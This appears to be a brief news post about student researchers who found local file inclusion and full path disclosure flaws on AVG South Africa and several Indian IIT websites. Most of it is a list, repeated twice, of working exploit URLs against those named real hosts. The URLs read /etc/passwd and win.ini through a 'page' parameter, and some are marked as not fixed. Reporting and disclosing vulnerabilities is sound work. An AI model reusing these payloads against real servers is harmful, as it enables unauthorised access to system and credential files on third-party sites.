Young Indian Security Researchers Discovered Vulnerability In Several Websites
Young Indian security researcher going by the name of Sandeep Singh, who is a second year BSC IT student,contacted us some days back.In his mail,he sent us several vulnerabilities which he and his friend Navneet Singh discovered in different websites.The very first website in which he discovered these issues was the AVG of South Africa.Two main vulnerabilities were there,namely the local file inclusion vulnerability and full path disclosure vulnerability.They provided us with the urls as a proof of concept.The same vulnerabilities were found in the IIT websites of India.They contacted them regarding this issue and as a respond,they were thanked and were asked for further help by IIT Bombay.Some of these have already been fixed.
AVG of South Africa
POC : http://www.avgantivirus.co.za/admin/index.php?page=C:\WINDOWS\win.ini
FPD : http://www.avgantivirus.co.za/admin/index.php?page=C:\WINDOWS\
IIT Bombay
http://www.phy.iitb.ac.in/olympiad/index.php?page=%2Fetc%2Fpasswd
Status:Fixed
IIT Allahabad
http://placement.iiita.ac.in/mainpage.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd
Status: Not Fixed
IIT Madras
http://www.cenlib.iitm.ac.in/docs/library/index.php?page=%2Fetc%2Fpasswd
Status: Not Fixed
IIT Kanpur
http://www.iitk.ac.in/ee/courses/archives/2013/OFDM/index.php?page=%2Fetc%2Fpasswd
Status: Fixed
AVG of South Africa
POC : http://www.avgantivirus.co.za/admin/index.php?page=C:\WINDOWS\win.ini
FPD : http://www.avgantivirus.co.za/admin/index.php?page=C:\WINDOWS\
IIT Bombay
http://www.phy.iitb.ac.in/olympiad/index.php?page=%2Fetc%2Fpasswd
Status:Fixed
IIT Allahabad
http://placement.iiita.ac.in/mainpage.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd
Status: Not Fixed
IIT Madras
http://www.cenlib.iitm.ac.in/docs/library/index.php?page=%2Fetc%2Fpasswd
Status: Not Fixed
IIT Kanpur
http://www.iitk.ac.in/ee/courses/archives/2013/OFDM/index.php?page=%2Fetc%2Fpasswd
Status: Fixed